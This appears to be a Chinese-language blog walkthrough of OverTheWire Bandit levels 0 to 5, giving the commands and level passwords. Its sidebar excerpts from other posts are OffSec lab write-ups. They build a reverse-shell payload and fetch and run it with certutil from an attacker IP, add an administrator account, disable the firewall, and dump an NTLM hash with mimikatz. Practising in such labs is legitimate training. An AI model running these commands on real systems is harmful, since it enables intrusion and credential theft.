OverTheWire Bandit Level 0 to Level 5

-

OverTheWire Bandit Level 0 to Level 5 


網站 : https://overthewire.org/wargames/bandit/

Level 0 : 

The goal of this level is for you to log into the game using SSH. The host to which you need to connect is bandit.labs.overthewire.org, on port 2220. The username is bandit0 and the password is bandit0. Once logged in, go to the Level 1 page to find out how to beat Level 1.

此級別的目標是讓您使用 SSH 登錄遊戲。 您需要連接的主機是 bandit.labs.overthewire.org,端口 2220。用戶名是 bandit0,密碼是 bandit0。 登錄後,轉到第 1 級頁面,了解如何通過第 1 級。

Level 0 很簡單只是要你依據左上角的資訊登入主機

主機 : bandit.labs.overthewire.org

帳號 : bandit0

密碼 : bandit0






Level 0 --> Level 1 :

The password for the next level is stored in a file called readme located in the home directory. Use this password to log into bandit1 using SSH. Whenever you find a password for a level, use SSH (on port 2220) to log into that level and continue the game.

下一級的密碼存儲在主目錄中名為 readme 的文件中。 使用此密碼通過 SSH 登錄 bandit1。 每當您找到某個關卡的密碼時,請使用 SSH(在端口 2220 上)登錄該關卡並繼續遊戲。


在 bandit0 登入後的 home 目錄即可看到 readme 文件,cat 即可得到下一關的密碼

bandit1 密碼 : NH2SXQwcBdpmTEzi3bvBHMM9H66vVXjL





Level 1 --> Level 2 :

The password for the next level is stored in a file called - located in the home directory

下一級的密碼存儲在主目錄中名為 - 的文件中


因為檔案名稱為 "-",ls 後可以看到檔案名稱如下圖,但直接 cat - 是無法顯示檔案的

因為系統會將 - 判斷為參數指令的一種


這題考的是透過絕對路徑的表示法來開啟文件,即可得到下一關的密碼

bandit2 密碼 : rRGizSaX8Mk1RTb1CNQoXTcYZWU6lgzi





Level 2 --> Level 3 :

The password for the next level is stored in a file called spaces in this filename located in the home directory

下一級的密碼存儲在主目錄中名為 "space in this filename" 的文件中


登入後 ls 即可看到檔案名稱為 "space in this filename" 的檔案

這一題考的是當檔案名稱中間有空白鍵時要如何透過指令去查看

其實輸入 cat space 後按下 TAB 鍵就可以得到答案了

bandit3 密碼 : aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG





Level 3 --> Level 4 :

The password for the next level is stored in a hidden file in the inhere directory.

下一級的密碼存儲在 inhere 目錄的隱藏文件中。


這一題考的是隱藏文件(開頭會有一個 "."),一樣先 ls 一下看到 inhere 資料夾

進入後使用 ls -al 即可看到隱藏文件,直接 cat 就可以得到答案了

Level4 密碼 : 2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe





Level 4 --> Level 5 :

The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

下一級的密碼存儲在 inhere 目錄中唯一人類可讀的文件中。 提示:如果您的終端出現問題,請嘗試“重置”命令。


這一題告知在 inhere 下有一個唯一人類可讀的檔案,所以使用 file 這個指令

可以看到僅有 -file07 是 ASCII 格式,所以就是他了,因為檔案名稱開頭是 "-"

所以一樣 cat 絕對路徑就可以得到答案了

bandit5 密碼 : lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR







Level 5 --> Level 6 :

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties:

  • human-readable
  • 1033 bytes in size
  • not executable

下一級的密碼存儲在 inhere 目錄下的某個文件中,並具有以下所有屬性:

人類可讀的

大小為 1033 字節

不可執行


登入後進入 inhere 目錄下可以看到有許多資料夾,可以透過 find 這個指令來查找文件




要人類可讀,大小又是 1033 bytes,又不可執行,可以透過以下的指令來查詢

find 加上參數 -type 後面接 f (f 指檔案,d 是目錄,我們要找檔案所以用 f)

另外大小的參數是 -size,1033 bytes 的表示法為 1033c

不可執行就直接下 ! -executable

完整指令 : "find -type f -size 1033c ! -executable"

即可看到僅有一個檔案在 maybehere07 目錄底下的 .file2,那就直接 cat 吧

bandit6 密碼 : P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

濫用 Windows 庫文件(Library File)

-
圖片
 濫用 Windows 庫文件(Library File) 首先在 Kali 上設置一個 WebDAV 共享,透過 pip3 先行安裝 指令 pip3 install wsgidav 建立一個路徑 /home/kali_r/webdav 目錄以用作包含 .link 文件的 WebDAV 共享 先在此路徑下建立一個 test.txt 文件 mkdir /home/kali_r/webdav & touch /home/kali_/webdav/test.txt 接下來將從 /home/kali_r/.local/bin 目錄運行 WsgiDAV。整個過程中使用 wsgidav 作為啟動服務器的命令。 提供的第一個參數是 --host,它指定要提供服務的主機 我們將監聽所有帶有 0.0.0.0 的接口 接下來使用 --port=80 指定偵聽端口,並使用 --auth=anonymous 禁用對共享的身份驗證 最後使用 --root /home/kali_r/webdav/ 設置為 WebDAV 共享目錄的根目錄 指令 └─$ /home/kali_r/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali_r/webdav/ netstat 一下可以看到已經有 listen 80 Port 用瀏覽器開啟測試,可以看到前面建立的 test.txt 接著使用 xfreerdp 登入到某台 windows  帳號 : offsec、密碼 : lab、掛載本機的 /home/kali_r 為遠端的網路磁碟機 aries └─$ xfreerdp -v:192.168.203.194 -u:offsec -p:lab -drive:aries,/home/kali_r 使用該台機器已安裝的 Visual Studio Code 來進行編輯接下來要用的攻擊檔案 建立一個新的文字檔 建立如下內容檔案 下面的列表包含庫文件的命名空間 。這是從 Windows 7 開始的庫文件格式版本的命名空間。該列表還包含庫描述的結束標記。涵蓋的以下所有標籤都將添加到 libraryDescription 標籤內。 <?xml version="1...
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容